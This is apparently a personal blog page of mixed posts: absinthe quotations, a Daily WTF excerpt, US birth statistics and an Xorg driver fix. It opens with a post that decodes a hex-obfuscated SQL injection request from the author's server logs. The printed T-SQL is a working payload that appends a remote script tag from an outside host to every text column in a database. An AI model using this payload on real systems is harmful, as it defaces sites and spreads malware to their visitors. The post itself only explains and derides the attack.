Science

xkcd.com P+C Randall Munroe

So, you're a dilettante. You let your box get rooted once. Eventually, you figure, "hey, let's upgrade!" So for the first time in a while I check logs. What do I find but some odd errors:

...ALERT - configured GET variable value length limit exceeded - dropped variable..

to which the attendant request looked like

"GET /?;DeCLARE @S CHAR(4000);SET @S=CAST(0x4445434C41.. [snip long hex] AS CHAR(4000));ExEC(@S); HTTP/1.1"

Let's translate:

DECLARE @T varchar(255),@C varchar(4000)
DECLARE Table_Cursor CURSOR FOR
select a.name,b.name
from sysobjects a,syscolumns b
where a.id=b.id
and a.xtype='u'
and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0) BEGIN
exec('update ['+@T+'] set ['+@C+']=['+@C+']+''">
</title><script src="http://www3.800mg.cn/csrss/w.js"></script>
<!--'' where '+@C+' not like ''%"></title>
<script src="http://www3.800mg.cn/csrss/w.js"></script><!--''')
FETCH NEXT FROM Table_Cursor INTO @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor

This is explained pretty well elsewhere. There is a complicated solution.

The joke here is that the solution is much easier. One, do not to install your webserver and db so stupidly they'll execute any old thing appended to a GET request. Two, consider not running SQL Server, to which this attack is specific, and not running Winders, to which malware ultimately is delivered.

I am annoyed by seeing this crap in my logs, though.

St. George Spirits Absinthe Verte
(Peter DaSilva/The New York Times)

After a few tries, [Lance Winters of St. George Spirits] found that grand wormwood was best used in just the first step of absinthe making, when it is infused into grape brandy along with anise and fennel and then distilled, so its bitterness could be left behind in the still. In the second step, he infused a portion of what came out of the still with lemon balm, hyssop, tarragon and other botanicals, including a much less bitter cousin of grand wormwood. Finally this flavorful infusion is mixed back into the result of the first distillation.

Pete Wells, A Liquor of Legend Makes a Comeback
The New York Times, 5. December 2007

With the doors set to open at 11:00 on a Friday morning on December 21st, we thought we were playing it safe by arriving in Alameda at 10:30. However, as there were about 160 people in line ahead of us, clearly others were playing it safer. We were in line not even 20 minutes when the line behind us snaked and bulged exponentially. When the doors did finally open at 11:00, the news came out that they were allowing in groups of 10.

Stephanie V. W. Lucianovic, The Worm Turns: Absinthe Verte
bayareabites.blogspot.com, 21. December 2007

The nearest shop to me with an allocation sold out before release, but I put my order in for an allotment and got the maximum pair. For now, the bottle on my bar and the one in my brother's luggage headed for Brazil (I think) then back to London are the only ones I've seen. Friends, neighbors and enthusiasts will have to visit for a sip until St. George gets on the horse and distills more.

Still sealed for now, so no review. I'll have to compare it to the now-well-distributed Lucid and my old standby, the made-by-a-real-distiller Segarra.

The Great Old Consultants worked day and night to create the great system that would come to be known as Codethulhu. They used only the most diabolical of materials: a Dell SatanicEdge sever, J2EE (Java 2 Evil Edition, not to be confused with Java 2 Enterprise Edition), and the souls of a thousand orphans. Once their work was complete, the Great Old Consultants vanished, never to be seen again.

Tried as they might, the company was unable to summon back the Great Old Consultants. This was particularly problematic because the Great Old Consultants took with them, the source code. With no source code available, there was simply no way to fix bugs and make changes to their custom, multi-million dollar software. That is, until one engineer had an idea: they could decompile the Java bytecode.

Decompiled code is not a very pretty thing. Many of the "niceties" of Java code -- comments, variable names, differentiation between FOR and WHILE loops -- are simply non-existent. And when the original code is developed by the Great Old Consultants, it becomes much worse than "not very pretty." It becomes pure evil.

Alex Papadimoulis, Classics Week: The Call of Codethulhu
The Daily WTF, 7. May 2007

US Registered Births, 1909-2004, chart P+C Political Calculations 2007

Highlights of US Registered Birth Data, 1909-2004
Generation (Years)	Registered Births	Peak Births (Year)	Low Births (Year)	Average Births
G.I. Generation (1909-1924)	46,316,000	3,055,000 (1921)	2,718,000 (1909)	2,894,750
Silent Generation (1925-1945)	55,332,000	3,104,000 (1943)	2,307,000 (1933)	2,634,857
Baby Boomer (1946-1964)	75,863,047	4,300,000 (1957)	3,411,000 (1946)	3,992,792
Generation X (1965-1981)	58,539,872	3,760,358 (1965)	3,136,965 (1973)	3,443,522
Generation Y (1982-1999)	70,125,668	4,158,212 (1990)	3,638,933 (1983)	3,895,870
Generation ??? (2000-2004+)	20,308,472	4,112,052 (2004)	4,021,726 (2002)	4,061,695

Ironman, Generations
Political Calculations, 30. April 2007

Xorg log warnings and one-line fix

It is time for another in my 'dilettantes' series.

After upgrading my xserver-xorg to 1.3, I found the nvidia-glx package has a little problem which unfortunately takes down X. With trepidation, I installed the experimental distribution kernel module source, built it, and installed that distribution's version of the driver, which worked, insofar as it brought up X again.

Alas, there was a niggling bug after all.

$ egrep '^\((EE|WW)\)' /var/log/Xorg.0.log.old
[snip]
(WW) Warning, couldn't open module wfb
(EE) Failed to load module "wfb" (module does not exist, 0)

It turns out that to fix this bug the experimental nvidia-glx needs a simple patch. Or, you can perform the following one-line fix and the module will load correctly.

# cd /usr/lib/xorg/modules
# ln -s libnvidia-wfb.so.1.0.9746 libwfb.so

Et voila, more system administration for dilettantes.